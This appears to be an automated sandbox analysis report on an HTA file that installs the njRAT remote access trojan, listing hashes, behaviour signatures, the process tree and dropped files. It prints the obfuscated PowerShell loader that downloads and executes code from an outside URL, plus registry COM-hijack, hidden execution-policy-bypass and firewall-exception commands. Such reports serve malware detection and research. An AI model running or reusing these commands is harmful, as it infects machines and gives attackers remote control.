Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
-
submitted
09-08-2022 19:13
General
-
Target
enc2.hta
-
Size
4KB
-
MD5
655efe95aac234dbfca94dda9b36db0e
-
SHA1
ab7a01b4048afe8a31348d48647fbbf2a0579e3f
-
SHA256
bb4c9c960b921042233d6835d513e320e353a616d44c089dc96a7f4b686e759b
-
SHA512
6928dd4d0201a3aec4e7d58da2d02e6a8bc4a3aa9e4b223e77f568ac094b752e5a18672124c1cc299870e6e81ce298d99017541f1d95cf64a229470dc998bd07
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 1 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.batFilesize
706B
MD56a90128893777a59d404d46d3e967104
SHA1e2b70c13764f2f61aa8503999670542237046bc4
SHA256b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319
SHA5125e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1Filesize
3KB
MD543864d67842266f76a91dc4aee7338c7
SHA1022259ecb6970f6790c329e36b94402ba815b5e0
SHA256c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf
SHA51232bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbsFilesize
1KB
MD5d6a5f499f7164e0d61a5b8a0b4900fba
SHA1054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9
SHA2565b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44
SHA5122129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58e42bec1f8f4c3705f1df36c21c85531
SHA1c9d6aac3c1b16ed12f22185ebdc9f921cd396d14
SHA256f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2
SHA512d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f87b0558f50792e4684d92fb3d271c24
SHA1e745842dfeec7403c04a660ad6a2f2231ba605bb
SHA25661d84320415c97ff5d41de5030ba8b8b77c04295d2137f95de9e947a954a8192
SHA51256275978bc50ff36bd9ace519adc25d204955983ba0394ced54f9a70d063c4445e591df6e697b536a1abce8cd4795b80e572f17ae31063c97926cff4553d51a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
memory/636-142-0x0000000000000000-mapping.dmp
-
memory/1988-160-0x0000000000000000-mapping.dmp
-
memory/2312-145-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/2312-156-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/2528-138-0x0000000000000000-mapping.dmp
-
memory/3492-161-0x0000000005F60000-0x0000000005FC6000-memory.dmpFilesize
408KB
-
memory/3492-158-0x00000000059B0000-0x0000000005F54000-memory.dmpFilesize
5.6MB
-
memory/3492-157-0x00000000052E0000-0x000000000537C000-memory.dmpFilesize
624KB
-
memory/3492-162-0x0000000006510000-0x000000000651A000-memory.dmpFilesize
40KB
-
memory/3492-159-0x0000000005400000-0x0000000005492000-memory.dmpFilesize
584KB
-
memory/3492-151-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3492-152-0x000000000040BBBE-mapping.dmp
-
memory/3580-134-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/3580-147-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/3580-133-0x0000000000000000-mapping.dmp
-
memory/4084-130-0x000002D5B9CA0000-0x000002D5B9CC2000-memory.dmpFilesize
136KB
-
memory/4084-150-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4084-131-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4084-132-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4232-140-0x0000000000000000-mapping.dmp
-
memory/4920-146-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4920-154-0x00007FFF3A4A0000-0x00007FFF3AF61000-memory.dmpFilesize
10.8MB
-
memory/4920-143-0x0000000000000000-mapping.dmp
-
memory/5000-141-0x0000000000000000-mapping.dmp
-
memory/5032-136-0x0000000000000000-mapping.dmp